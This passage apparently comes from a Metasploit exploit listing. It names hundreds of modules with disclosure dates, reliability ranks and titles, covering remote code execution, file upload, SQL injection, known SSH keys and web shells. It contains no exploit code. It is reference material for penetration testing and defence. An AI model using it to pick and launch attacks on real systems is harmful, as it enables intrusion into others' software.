   linux/misc/opennms_java_serialize                                 2015-11-06       normal     OpenNMS Java Object Unserialization Remote Code Execution
   linux/misc/qnap_transcode_server                                  2017-08-06       excellent  QNAP Transcode Server Command Execution
   linux/misc/quest_pmmasterd_bof                                    2017-04-09       normal     Quest Privilege Manager pmmasterd Buffer Overflow
   linux/misc/sercomm_exec                                           2013-12-31       great      SerComm Device Remote Code Execution
   linux/misc/ueb9_bpserverd                                         2017-08-08       excellent  Unitrends UEB bpserverd authentication bypass RCE
   linux/misc/zabbix_server_exec                                     2009-09-10       excellent  Zabbix Server Arbitrary Command Execution
   linux/mysql/mysql_yassl_getname                                   2010-01-25       good       MySQL yaSSL CertDecoder::GetName Buffer Overflow
   linux/mysql/mysql_yassl_hello                                     2008-01-04       good       MySQL yaSSL SSL Hello Message Buffer Overflow
   linux/pop3/cyrus_pop3d_popsubfolders                              2006-05-21       normal     Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
   linux/postgres/postgres_payload                                   2007-06-05       excellent  PostgreSQL for Linux Payload Execution
   linux/pptp/poptop_negative_read                                   2003-04-09       great      Poptop Negative Read Overflow
   linux/proxy/squid_ntlm_authenticate                               2004-06-08       great      Squid NTLM Authenticate Overflow
   linux/samba/chain_reply                                           2010-06-16       good       Samba chain_reply Memory Corruption (Linux x86)
   linux/samba/is_known_pipename                                     2017-03-24       excellent  Samba is_known_pipename() Arbitrary Module Load
   linux/samba/lsa_transnames_heap                                   2007-05-14       good       Samba lsa_io_trans_names Heap Overflow
   linux/samba/setinfopolicy_heap                                    2012-04-10       normal     Samba SetInformationPolicy AuditEventsInfo Heap Overflow
   linux/samba/trans2open                                            2003-04-07       great      Samba trans2open Overflow (Linux x86)
   linux/smtp/exim4_dovecot_exec                                     2013-05-03       excellent  Exim and Dovecot Insecure Configuration Command Injection
   linux/smtp/exim_gethostbyname_bof                                 2015-01-27       great      Exim GHOST (glibc gethostbyname) Buffer Overflow
   linux/smtp/haraka                                                 2017-01-26       excellent  Haraka SMTP Command Injection
   linux/ssh/ceragon_fibeair_known_privkey                           2015-04-01       excellent  Ceragon FibeAir IP-10 SSH Private Key Exposure
   linux/ssh/exagrid_known_privkey                                   2016-04-07       excellent  ExaGrid Known SSH Key and Default Password
   linux/ssh/f5_bigip_known_privkey                                  2012-06-11       excellent  F5 BIG-IP SSH Private Key Exposure
   linux/ssh/loadbalancerorg_enterprise_known_privkey                2014-03-17       excellent  Loadbalancer.org Enterprise VA SSH Private Key Exposure
   linux/ssh/mercurial_ssh_exec                                      2017-04-18       excellent  Mercurial Custom hg-ssh Wrapper Remote Code Exec
   linux/ssh/quantum_dxi_known_privkey                               2014-03-17       excellent  Quantum DXi V1000 SSH Private Key Exposure
   linux/ssh/quantum_vmpro_backdoor                                  2014-03-17       excellent  Quantum vmPRO Backdoor Command
   linux/ssh/solarwinds_lem_exec                                     2017-03-17       excellent  SolarWind LEM Default SSH Password Remote Code Execution
   linux/ssh/symantec_smg_ssh                                        2012-08-27       excellent  Symantec Messaging Gateway 9.5 Default SSH Password Vulnerability
   linux/ssh/ubiquiti_airos_file_upload                              2016-02-13       excellent  Ubiquiti airOS Arbitrary File Upload
   linux/ssh/vmware_vdp_known_privkey                                2016-12-20       excellent  VMware VDP Known SSH Key
   linux/telnet/telnet_encrypt_keyid                                 2011-12-23       great      Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow
   linux/upnp/dlink_upnp_msearch_exec                                2013-02-01       excellent  D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection
   linux/upnp/miniupnpd_soap_bof                                     2013-03-27       normal     MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution
   mainframe/ftp/ftp_jcl_creds                                       2013-05-12       normal     FTP JCL Execution
   multi/browser/adobe_flash_hacking_team_uaf                        2015-07-06       great      Adobe Flash Player ByteArray Use After Free
   multi/browser/adobe_flash_nellymoser_bof                          2015-06-23       great      Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow
   multi/browser/adobe_flash_net_connection_confusion                2015-03-12       great      Adobe Flash Player NetConnection Type Confusion
   multi/browser/adobe_flash_opaque_background_uaf                   2015-07-06       great      Adobe Flash opaqueBackground Use After Free
   multi/browser/adobe_flash_pixel_bender_bof                        2014-04-28       great      Adobe Flash Player Shader Buffer Overflow
   multi/browser/adobe_flash_shader_drawing_fill                     2015-05-12       great      Adobe Flash Player Drawing Fill Shader Memory Corruption
   multi/browser/adobe_flash_shader_job_overflow                     2015-05-12       great      Adobe Flash Player ShaderJob Buffer Overflow
   multi/browser/adobe_flash_uncompress_zlib_uaf                     2014-04-28       great      Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free
   multi/browser/firefox_escape_retval                               2009-07-13       normal     Firefox 3.5 escape() Return Value Memory Corruption
   multi/browser/firefox_pdfjs_privilege_escalation                  2015-03-31       manual     Firefox PDF.js Privileged Javascript Injection
   multi/browser/firefox_proto_crmfrequest                           2013-08-06       excellent  Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution
   multi/browser/firefox_proxy_prototype                             2014-01-20       manual     Firefox Proxy Prototype Privileged Javascript Injection
   multi/browser/firefox_queryinterface                              2006-02-02       normal     Firefox location.QueryInterface() Code Execution
   multi/browser/firefox_svg_plugin                                  2013-01-08       excellent  Firefox 17.0.1 Flash Privileged Code Injection
   multi/browser/firefox_tostring_console_injection                  2013-05-14       excellent  Firefox toString console.time Privileged Javascript Injection
   multi/browser/firefox_webidl_injection                            2014-03-17       excellent  Firefox WebIDL Privileged Javascript Injection
   multi/browser/firefox_xpi_bootstrapped_addon                      2007-06-27       excellent  Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution
   multi/browser/itms_overflow                                       2009-06-01       great      Apple OS X iTunes 8.1.1 ITMS Overflow
   multi/browser/java_atomicreferencearray                           2012-02-14       excellent  Java AtomicReferenceArray Type Violation Vulnerability
   multi/browser/java_calendar_deserialize                           2008-12-03       excellent  Sun Java Calendar Deserialization Privilege Escalation
   multi/browser/java_getsoundbank_bof                               2009-11-04       great      Sun Java JRE getSoundbank file:// URI Buffer Overflow
   multi/browser/java_jre17_driver_manager                           2013-01-10       excellent  Java Applet Driver Manager Privileged toString() Remote Code Execution
   multi/browser/java_jre17_exec                                     2012-08-26       excellent  Java 7 Applet Remote Code Execution
   multi/browser/java_jre17_glassfish_averagerangestatisticimpl      2012-10-16       excellent  Java Applet AverageRangeStatisticImpl Remote Code Execution
   multi/browser/java_jre17_jaxws                                    2012-10-16       excellent  Java Applet JAX-WS Remote Code Execution
   multi/browser/java_jre17_jmxbean                                  2013-01-10       excellent  Java Applet JMX Remote Code Execution
   multi/browser/java_jre17_jmxbean_2                                2013-01-19       excellent  Java Applet JMX Remote Code Execution
   multi/browser/java_jre17_method_handle                            2012-10-16       excellent  Java Applet Method Handle Remote Code Execution
   multi/browser/java_jre17_provider_skeleton                        2013-06-18       great      Java Applet ProviderSkeleton Insecure Invoke Method
   multi/browser/java_jre17_reflection_types                         2013-01-10       excellent  Java Applet Reflection Type Confusion Remote Code Execution
   multi/browser/java_rhino                                          2011-10-18       excellent  Java Applet Rhino Script Engine Remote Code Execution
   multi/browser/java_rmi_connection_impl                            2010-03-31       excellent  Java RMIConnectionImpl Deserialization Privilege Escalation
   multi/browser/java_setdifficm_bof                                 2009-11-04       great      Sun Java JRE AWT setDiffICM Buffer Overflow
   multi/browser/java_signed_applet                                  1997-02-19       excellent  Java Signed Applet Social Engineering Code Execution
   multi/browser/java_storeimagearray                                2013-08-12       great      Java storeImageArray() Invalid Array Indexing Vulnerability
   multi/browser/java_trusted_chain                                  2010-03-31       excellent  Java Statement.invoke() Trusted Method Chain Privilege Escalation
   multi/browser/java_verifier_field_access                          2012-06-06       excellent  Java Applet Field Bytecode Verifier Cache Remote Code Execution
   multi/browser/mozilla_compareto                                   2005-07-13       normal     Mozilla Suite/Firefox compareTo() Code Execution
   multi/browser/mozilla_navigatorjava                               2006-07-25       normal     Mozilla Suite/Firefox Navigator Object Code Execution
   multi/browser/opera_configoverwrite                               2007-03-05       excellent  Opera 9 Configuration Overwrite
   multi/browser/opera_historysearch                                 2008-10-23       excellent  Opera historysearch XSS
   multi/browser/qtjava_pointer                                      2007-04-23       excellent  Apple QTJava toQTPointer() Arbitrary Memory Access
   multi/elasticsearch/script_mvel_rce                               2013-12-09       excellent  ElasticSearch Dynamic Script Arbitrary Java Execution
   multi/elasticsearch/search_groovy_script                          2015-02-11       excellent  ElasticSearch Search Groovy Sandbox Bypass
   multi/fileformat/adobe_u3d_meshcont                               2009-10-13       good       Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
   multi/fileformat/js_unpacker_eval_injection                       2015-02-18       excellent  Javascript Injection for Eval-based Unpackers
   multi/fileformat/maple_maplet                                     2010-04-26       excellent  Maple Maplet File Creation and Command Execution
   multi/fileformat/nodejs_js_yaml_load_code_exec                    2013-06-28       excellent  Nodejs js-yaml load() Code Execution
   multi/fileformat/office_word_macro                                2012-01-10       excellent  Microsoft Office Word Malicious Macro Execution
   multi/fileformat/peazip_command_injection                         2009-06-05       excellent  PeaZip Zip Processing Command Injection
   multi/fileformat/swagger_param_inject                             2016-06-23       excellent  JSON Swagger CodeGen Parameter Injector
   multi/ftp/pureftpd_bash_env_exec                                  2014-09-24       excellent  Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
   multi/ftp/wuftpd_site_exec_format                                 2000-06-22       great      WU-FTPD SITE EXEC/INDEX Format String Vulnerability
   multi/gdb/gdb_server_exec                                         2014-08-24       great      GDB Server Remote Payload Execution
   multi/handler                                                                      manual     Generic Payload Handler
   multi/http/activecollab_chat                                      2012-05-30       excellent  Active Collab "chat module" Remote PHP Code Injection Exploit
   multi/http/ajaxplorer_checkinstall_exec                           2010-04-04       excellent  AjaXplorer checkInstall.php Remote Command Execution
   multi/http/apache_activemq_upload_jsp                             2016-06-01       excellent  ActiveMQ web shell upload
   multi/http/apache_jetspeed_file_upload                            2016-03-06       manual     Apache Jetspeed Arbitrary File Upload
   multi/http/apache_mod_cgi_bash_env_exec                           2014-09-24       excellent  Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
   multi/http/apache_roller_ognl_injection                           2013-10-31       excellent  Apache Roller OGNL Injection
   multi/http/apprain_upload_exec                                    2012-01-19       excellent  appRain CMF Arbitrary PHP File Upload Vulnerability
   multi/http/atutor_sqli                                            2016-03-01       excellent  ATutor 2.2.1 SQL Injection / Remote Code Execution
   multi/http/auxilium_upload_exec                                   2012-09-14       excellent  Auxilium RateMyPet Arbitrary File Upload Vulnerability
   multi/http/axis2_deployer                                         2010-12-30       excellent  Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP)
   multi/http/bassmaster_js_injection                                2016-11-01       excellent  Bassmaster Batch Arbitrary JavaScript Injection Remote Code Execution
   multi/http/bolt_file_upload                                       2015-08-17       excellent  CMS Bolt File Upload Vulnerability
   multi/http/builderengine_upload_exec                              2016-09-18       excellent  BuilderEngine Arbitrary File Upload Vulnerability and execution
   multi/http/caidao_php_backdoor_exec                               2015-10-27       excellent  China Chopper Caidao PHP Backdoor Code Execution
   multi/http/cisco_dcnm_upload                                      2013-09-18       excellent  Cisco Prime Data Center Network Manager Arbitrary File Upload
   multi/http/coldfusion_rds                                         2013-08-08       great      Adobe ColdFusion 9 Administrative Login Bypass
   multi/http/cups_bash_env_exec                                     2014-09-24       excellent  CUPS Filter Bash Environment Variable Code Injection (Shellshock)
   multi/http/cuteflow_upload_exec                                   2012-07-27       excellent  CuteFlow v2.11.2 Arbitrary File Upload Vulnerability
   multi/http/dexter_casinoloader_exec                               2014-02-08       excellent  Dexter (CasinoLoader) SQL Injection
   multi/http/drupal_drupageddon                                     2014-10-15       excellent  Drupal HTTP Parameter Key/Value SQL Injection
   multi/http/eaton_nsm_code_exec                                    2012-06-26       excellent  Network Shutdown Module (sort_values) Remote PHP Code Injection
   multi/http/eventlog_file_upload                                   2014-08-31       excellent  ManageEngine Eventlog Analyzer Arbitrary File Upload
   multi/http/extplorer_upload_exec                                  2012-12-31       excellent  eXtplorer v2.1 Arbitrary File Upload Vulnerability
   multi/http/familycms_less_exec                                    2011-11-29       excellent  Family Connections less.php Remote Command Execution
   multi/http/freenas_exec_raw                                       2010-11-06       great      FreeNAS exec_raw.php Arbitrary Command Execution
   multi/http/gestioip_exec                                          2013-10-04       excellent  GestioIP Remote Command Execution
   multi/http/git_client_command_exec                                2014-12-18       excellent  Malicious Git and Mercurial HTTP Server For CVE-2014-9390
   multi/http/git_submodule_command_exec                             2017-08-10       excellent  Malicious Git HTTP Server For CVE-2017-1000117
   multi/http/gitlab_shell_exec                                      2013-11-04       excellent  Gitlab-shell Code Execution
   multi/http/gitorious_graph                                        2012-01-19       excellent  Gitorious Arbitrary Command Execution
   multi/http/glassfish_deployer                                     2011-08-04       excellent  Sun/Oracle GlassFish Server Authenticated Code Execution
   multi/http/glossword_upload_exec                                  2013-02-05       excellent  Glossword v1.8.8 - 1.8.12 Arbitrary File Upload Vulnerability
   multi/http/glpi_install_rce                                       2013-09-12       manual     GLPI install.php Remote Command Execution
   multi/http/horde_href_backdoor                                    2012-02-13       excellent  Horde 3.3.12 Backdoor Arbitrary PHP Code Execution
   multi/http/hp_sitescope_issuesiebelcmd                            2013-10-30       great      HP SiteScope issueSiebelCmd Remote Code Execution
   multi/http/hp_sitescope_uploadfileshandler                        2012-08-29       good       HP SiteScope Remote Code Execution
   multi/http/hp_sys_mgmt_exec                                       2013-06-11       excellent  HP System Management Homepage JustGetSNMPQueue Command Injection
   multi/http/hyperic_hq_script_console                              2013-10-10       excellent  VMware Hyperic HQ Groovy Script-Console Java Execution
   multi/http/ibm_openadmin_tool_soap_welcomeserver_exec             2017-05-30       excellent  IBM OpenAdmin Tool SOAP welcomeServer PHP Code Execution
   multi/http/ispconfig_php_exec                                     2013-10-30       excellent  ISPConfig Authenticated Arbitrary PHP Code Execution
   multi/http/jboss_bshdeployer                                      2010-04-26       excellent  JBoss JMX Console Beanshell Deployer WAR Upload and Deployment
   multi/http/jboss_deploymentfilerepository                         2010-04-26       excellent  JBoss Java Class DeploymentFileRepository WAR Deployment
   multi/http/jboss_invoke_deploy                                    2007-02-20       excellent  JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)
   multi/http/jboss_maindeployer                                     2007-02-20       excellent  JBoss JMX Console Deployer Upload and Execute
   multi/http/jboss_seam_upload_exec                                 2010-08-05       normal     JBoss Seam 2 File Upload and Execute
   multi/http/jenkins_script_console                                 2013-01-18       good       Jenkins-CI Script-Console Java Execution
   multi/http/jira_hipchat_template                                  2015-10-28       excellent  Atlassian HipChat for Jira Plugin Velocity Template Injection
   multi/http/joomla_http_header_rce                                 2015-12-14       excellent  Joomla HTTP Header Unauthenticated Remote Code Execution
   multi/http/kordil_edms_upload_exec                                2013-02-22       excellent  Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability
   multi/http/lcms_php_exec                                          2011-03-03       excellent  LotusCMS 3.0 eval() Remote Command Execution
   multi/http/log1cms_ajax_create_folder                             2011-04-11       excellent  Log1 CMS writeInfo() PHP Code Injection
   multi/http/magento_unserialize                                    2016-05-17       excellent  Magento 2.0.6 Unserialize Remote Code Execution
   multi/http/makoserver_cmd_exec                                    2017-09-03       excellent  Mako Server v2.5, 2.6 OS Command Injection RCE
   multi/http/manage_engine_dc_pmp_sqli                              2014-06-08       excellent  ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
   multi/http/manageengine_auth_upload                               2014-12-15       excellent  ManageEngine Multiple Products Authenticated File Upload
   multi/http/manageengine_sd_uploader                               2015-08-20       excellent  ManageEngine ServiceDesk Plus Arbitrary File Upload
   multi/http/manageengine_search_sqli                               2012-10-18       excellent  ManageEngine Security Manager Plus 5.5 Build 5505 SQL Injection
   multi/http/mantisbt_php_exec                                      2014-11-08       great      MantisBT XmlImportExport Plugin PHP Code Injection Vulnerability
   multi/http/mediawiki_syntaxhighlight                              2017-04-06       good       MediaWiki SyntaxHighlight extension option injection vulnerability
   multi/http/mediawiki_thumb                                        2014-01-28       excellent  MediaWiki Thumb.php Remote Command Execution
   multi/http/metasploit_static_secret_key_base                      2016-09-15       excellent  Metasploit Web UI Static secret_key_base Value
   multi/http/metasploit_webui_console_command_execution             2016-08-23       excellent  Metasploit Web UI Diagnostic Console Command Execution
   multi/http/mma_backdoor_upload                                    2012-04-02       excellent  Th3 MMA mma.php Backdoor Arbitrary File Upload
   multi/http/mobilecartly_upload_exec                               2012-08-10       excellent  MobileCartly 1.0 Arbitrary File Creation Vulnerability
   multi/http/moodle_cmd_exec                                        2013-10-30       good       Moodle Remote Command Execution
   multi/http/movabletype_upgrade_exec                               2013-01-07       excellent  Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution
   multi/http/mutiny_subnetmask_exec                                 2012-10-22       excellent  Mutiny Remote Command Execution
   multi/http/nas4free_php_exec                                      2013-10-30       great      NAS4Free Arbitrary Remote Code Execution
   multi/http/netwin_surgeftp_exec                                   2012-12-06       good       Netwin SurgeFTP Remote Command Execution
   multi/http/nibbleblog_file_upload                                 2015-09-01       excellent  Nibbleblog File Upload Vulnerability
   multi/http/novell_servicedesk_rce                                 2016-03-30       excellent  Novell ServiceDesk Authenticated File Upload
   multi/http/op5_license                                            2012-01-05       excellent  OP5 license.php Remote Command Execution
   multi/http/op5_welcome                                            2012-01-05       excellent  OP5 welcome Remote Command Execution
   multi/http/openfire_auth_bypass                                   2008-11-10       excellent  Openfire Admin Console Authentication Bypass
   multi/http/openmediavault_cmd_exec                                2013-10-30       excellent  OpenMediaVault Cron Remote Command Execution
   multi/http/openx_backdoor_php                                     2013-08-07       excellent  OpenX Backdoor PHP Code Execution
   multi/http/opmanager_socialit_file_upload                         2014-09-27       excellent  ManageEngine OpManager and Social IT Arbitrary File Upload
   multi/http/oracle_ats_file_upload                                 2016-01-20       excellent  Oracle ATS Arbitrary File Upload
   multi/http/oracle_reports_rce                                     2014-01-15       great      Oracle Forms and Reports Remote Code Execution
   multi/http/orientdb_exec                                          2017-07-13       good       OrientDB 2.2.x Remote Code Execution
   multi/http/pandora_upload_exec                                    2010-11-30       excellent  Pandora FMS v3.1 Auth Bypass and Arbitrary File Upload Vulnerability
   multi/http/phoenix_exec                                           2016-07-01       excellent  Phoenix Exploit Kit Remote Code Execution
   multi/http/php_cgi_arg_injection                                  2012-05-03       excellent  PHP CGI Argument Injection
   multi/http/php_utility_belt_rce                                   2015-12-08       excellent  PHP Utility Belt Remote Code Execution
   multi/http/php_volunteer_upload_exec                              2012-05-28       excellent  PHP Volunteer Management System v1.0.2 Arbitrary File Upload Vulnerability
   multi/http/phpfilemanager_rce                                     2015-08-28       excellent  phpFileManager 0.9.8 Remote Code Execution
   multi/http/phpldapadmin_query_engine                              2011-10-24       excellent  phpLDAPadmin query_engine Remote PHP Code Injection
   multi/http/phpmailer_arg_injection                                2016-12-26       manual     PHPMailer Sendmail Argument Injection
   multi/http/phpmoadmin_exec                                        2015-03-03       excellent  PHPMoAdmin 1.1.2 Remote Code Execution
   multi/http/phpmyadmin_3522_backdoor                               2012-09-25       normal     phpMyAdmin 3.5.2.2 server_sync.php Backdoor
   multi/http/phpmyadmin_preg_replace                                2013-04-25       excellent  phpMyAdmin Authenticated Remote Code Execution via preg_replace()
   multi/http/phpscheduleit_start_date                               2008-10-01       excellent  phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection
   multi/http/phptax_exec                                            2012-10-08       excellent  PhpTax pfilez Parameter Exec Remote Code Injection
   multi/http/phpwiki_ploticus_exec                                  2014-09-11       excellent  Phpwiki Ploticus Remote Code Execution
   multi/http/plone_popen2                                           2011-10-04       excellent  Plone and Zope XMLTools Remote Command Execution
   multi/http/pmwiki_pagelist                                        2011-11-09       excellent  PmWiki pagelist.php Remote PHP Code Injection Exploit
   multi/http/polarcms_upload_exec                                   2012-01-21       excellent  PolarBear CMS PHP File Upload Vulnerability
   multi/http/processmaker_exec                                      2013-10-24       excellent  ProcessMaker Open Source Authenticated PHP Code Execution
   multi/http/qdpm_upload_exec                                       2012-06-14       excellent  qdPM v7 Arbitrary PHP File Upload Vulnerability
   multi/http/rails_actionpack_inline_exec                           2016-03-01       excellent  Ruby on Rails ActionPack Inline ERB Code Execution
   multi/http/rails_dynamic_render_code_exec                         2016-10-16       excellent  Ruby on Rails Dynamic Render File Upload Remote Code Execution
   multi/http/rails_json_yaml_code_exec                              2013-01-28       excellent  Ruby on Rails JSON Processor YAML Deserialization Code Execution
   multi/http/rails_secret_deserialization                           2013-04-11       excellent  Ruby on Rails Known Secret Session Cookie Remote Code Execution
   multi/http/rails_web_console_v2_code_exec                         2015-06-16       excellent  Ruby on Rails Web Console (v2) Whitelist Bypass Code Execution
   multi/http/rails_xml_yaml_code_exec                               2013-01-07       excellent  Ruby on Rails XML Processor YAML Deserialization Code Execution
   multi/http/rocket_servergraph_file_requestor_rce                  2013-10-30       great      Rocket Servergraph Admin Center fileRequestor Remote Code Execution
   multi/http/sflog_upload_exec                                      2012-07-06       excellent  Sflog! CMS 1.0 Arbitrary File Upload Vulnerability
   multi/http/simple_backdoors_exec                                  2015-09-08       excellent  Simple Backdoor Shell Remote Code Execution
   multi/http/sit_file_upload                                        2011-11-10       excellent  Support Incident Tracker Remote Command Execution
   multi/http/snortreport_exec                                       2011-09-19       excellent  Snortreport nmap.php/nbtscan.php Remote Command Execution
   multi/http/solarwinds_store_manager_auth_filter                   2014-08-19       excellent  SolarWinds Storage Manager Authentication Bypass
   multi/http/sonicwall_gms_upload                                   2012-01-17       excellent  SonicWALL GMS 6 Arbitrary File Upload
   multi/http/sonicwall_scrutinizer_methoddetail_sqli                2014-07-24       excellent  Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection
   multi/http/splunk_mappy_exec                                      2011-12-12       excellent  Splunk Search Remote Code Execution
   multi/http/splunk_upload_app_exec                                 2012-09-27       good       Splunk Custom App Remote Code Execution
   multi/http/spree_search_exec                                      2011-10-05       excellent  Spreecommerce 0.60.1 Arbitrary Command Execution
   multi/http/spree_searchlogic_exec                                 2011-04-19       excellent  Spreecommerce Arbitrary Command Execution
   multi/http/struts2_content_type_ognl                              2017-03-07       excellent  Apache Struts Jakarta Multipart Parser OGNL Injection
   multi/http/struts2_rest_xstream                                   2017-09-05       excellent  Apache Struts 2 REST Plugin XStream RCE
   multi/http/struts_code_exec                                       2010-07-13       good       Apache Struts Remote Command Execution
   multi/http/struts_code_exec_classloader                           2014-03-06       manual     Apache Struts ClassLoader Manipulation Remote Code Execution
   multi/http/struts_code_exec_exception_delegator                   2012-01-06       excellent  Apache Struts Remote Command Execution
   multi/http/struts_code_exec_parameters                            2011-10-01       excellent  Apache Struts ParametersInterceptor Remote Code Execution
   multi/http/struts_default_action_mapper                           2013-07-02       excellent  Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
   multi/http/struts_dev_mode                                        2012-01-06       excellent  Apache Struts 2 Developer Mode OGNL Execution
   multi/http/struts_dmi_exec                                        2016-04-27       excellent  Apache Struts Dynamic Method Invocation Remote Code Execution
   multi/http/struts_dmi_rest_exec                                   2016-06-01       excellent  Apache Struts REST Plugin With Dynamic Method Invocation Remote Code Execution
   multi/http/struts_include_params                                  2013-05-24       great      Apache Struts includeParams Remote Code Execution
   multi/http/stunshell_eval                                         2013-03-23       great      STUNSHELL Web Shell Remote PHP Code Execution
   multi/http/stunshell_exec                                         2013-03-23       great      STUNSHELL Web Shell Remote Code Execution
   multi/http/sun_jsws_dav_options                                   2010-01-20       great      Sun Java System Web Server WebDAV OPTIONS Buffer Overflow
   multi/http/sysaid_auth_file_upload                                2015-06-03       excellent  SysAid Help Desk Administrator Portal Arbitrary File Upload
   multi/http/sysaid_rdslogs_file_upload                             2015-06-03       excellent  SysAid Help Desk 'rdslogs' Arbitrary File Upload
   multi/http/testlink_upload_exec                                   2012-08-13       excellent  TestLink v1.9.3 Arbitrary File Upload Vulnerability
   multi/http/tomcat_jsp_upload_bypass                               2017-10-03       excellent  Tomcat RCE via JSP Upload Bypass
   multi/http/tomcat_mgr_deploy                                      2009-11-09       excellent  Apache Tomcat Manager Application Deployer Authenticated Code Execution
   multi/http/tomcat_mgr_upload                                      2009-11-09       excellent  Apache Tomcat Manager Authenticated Upload Code Execution
   multi/http/traq_plugin_exec                                       2011-12-12       excellent  Traq admincp/common.php Remote Code Execution
   multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi        2017-04-10       excellent  Trend Micro Threat Discovery Appliance admin_sys_time.cgi Remote Command Execution
   multi/http/uptime_file_upload_1                                   2013-11-19       excellent  Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload
   multi/http/uptime_file_upload_2                                   2013-11-18       excellent  Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload
   multi/http/v0pcr3w_exec                                           2013-03-23       great      v0pCr3w Web Shell Remote Code Execution
   multi/http/vbseo_proc_deutf                                       2012-01-23       excellent  vBSEO proc_deutf() Remote PHP Code Injection
   multi/http/vbulletin_unserialize                                  2015-11-04       excellent  vBulletin 5.1.2 Unserialize Code Execution
   multi/http/visual_mining_netcharts_upload                         2014-11-03       excellent  Visual Mining NetCharts Server Remote Code Execution
   multi/http/vtiger_install_rce                                     2014-03-05       manual     Vtiger Install Unauthenticated Remote Command Execution
   multi/http/vtiger_php_exec                                        2013-10-30       excellent  vTigerCRM v5.4.0/v5.3.0 Authenticated Remote Code Execution
   multi/http/vtiger_soap_upload                                     2013-03-26       excellent  vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload
   multi/http/webnms_file_upload                                     2016-07-04       excellent  WebNMS Framework Server Arbitrary File Upload
   multi/http/webpagetest_upload_exec                                2012-07-13       excellent  WebPageTest Arbitrary PHP File Upload
   multi/http/werkzeug_debug_rce                                     2015-06-28       excellent  Werkzeug Debug Shell Command Execution
   multi/http/wikka_spam_exec                                        2011-11-30       excellent  WikkaWiki 1.3.2 Spam Logging PHP Injection
   multi/http/wp_ninja_forms_unauthenticated_file_upload             2016-05-04       excellent  WordPress Ninja Forms Unauthenticated File Upload
   multi/http/x7chat2_php_exec                                       2014-10-27       excellent  X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution
   multi/http/zabbix_script_exec                                     2013-10-30       excellent  Zabbix Authenticated Remote Command Execution
   multi/http/zemra_panel_rce                                        2012-06-28       excellent  Zemra Botnet CnC Web Panel Remote Code Execution
   multi/http/zenworks_configuration_management_upload               2015-04-07       excellent  Novell ZENworks Configuration Management Arbitrary File Upload
   multi/http/zenworks_control_center_upload                         2013-03-22       great      Novell ZENworks Configuration Management Remote Execution
   multi/http/zpanel_information_disclosure_rce                      2014-01-30       excellent  Zpanel Remote Unauthenticated RCE
   multi/ids/snort_dce_rpc                                           2007-02-19       good       Snort 2 DCE/RPC Preprocessor Buffer Overflow
   multi/local/allwinner_backdoor                                    2016-04-30       excellent  Allwinner 3.4 Legacy Kernel Local Privilege Escalation
   multi/misc/arkeia_agent_exec                                      2015-07-10       great      Western Digital Arkeia Remote Code Execution
   multi/misc/batik_svg_java                                         2012-05-11       excellent  Squiggle 1.7 SVG Browser Java Code Execution
   multi/misc/hp_data_protector_exec_integutil                       2014-10-02       great      HP Data Protector EXEC_INTEGUTIL Remote Code Execution
   multi/misc/hp_vsa_exec                                            2011-11-11       excellent  HP StorageWorks P4000 Virtual SAN Appliance Command Execution
   multi/misc/indesign_server_soap                                   2012-11-11       excellent  Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution
   multi/misc/java_jdwp_debugger                                     2010-03-12       good       Java Debug Wire Protocol Remote Code Execution
   multi/misc/java_jmx_server                                        2013-05-22       excellent  Java JMX Server Insecure Configuration Java Code Execution
   multi/misc/java_rmi_server                                        2011-10-15       excellent  Java RMI Server Insecure Default Configuration Java Code Execution
   multi/misc/legend_bot_exec                                        2015-04-27       excellent  Legend Perl IRC Bot Remote Code Execution
   multi/misc/msf_rpc_console                                        2011-05-22       excellent  Metasploit RPC Console Command Execution
   multi/misc/nodejs_v8_debugger                                     2016-08-15       excellent  NodeJS Debugger Command Injection
   multi/misc/openoffice_document_macro                              2017-02-08       excellent  Apache OpenOffice Text Document Malicious Macro Execution
   multi/misc/openview_omniback_exec                                 2001-02-28       excellent  HP OpenView OmniBack II Command Execution
   multi/misc/pbot_exec                                              2009-11-02       excellent  PHP IRC Bot pbot eval() Remote Code Execution
   multi/misc/persistent_hpca_radexec_exec                           2014-01-02       great      HP Client Automation Command Injection
   multi/misc/ra1nx_pubcall_exec                                     2013-03-24       great      Ra1NX PHP Bot PubCall Authentication Bypass Remote Code Execution
   multi/misc/veritas_netbackup_cmdexec                              2004-10-21       excellent  VERITAS NetBackup Remote Command Execution
   multi/misc/w3tw0rk_exec                                           2015-06-04       excellent  w3tw0rk / Pitbul IRC Bot  Remote Code Execution
   multi/misc/wireshark_lwres_getaddrbyname                          2010-01-27       great      Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow
   multi/misc/wireshark_lwres_getaddrbyname_loop                     2010-01-27       great      Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)
   multi/misc/xdh_x_exec                                             2015-12-04       excellent  Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
   multi/misc/zend_java_bridge                                       2011-03-28       great      Zend Server Java Bridge Arbitrary Java Code Execution
   multi/ntp/ntp_overflow                                            2001-04-04       good       NTP Daemon readvar Buffer Overflow
   multi/php/php_unserialize_zval_cookie                             2007-03-04       average    PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)
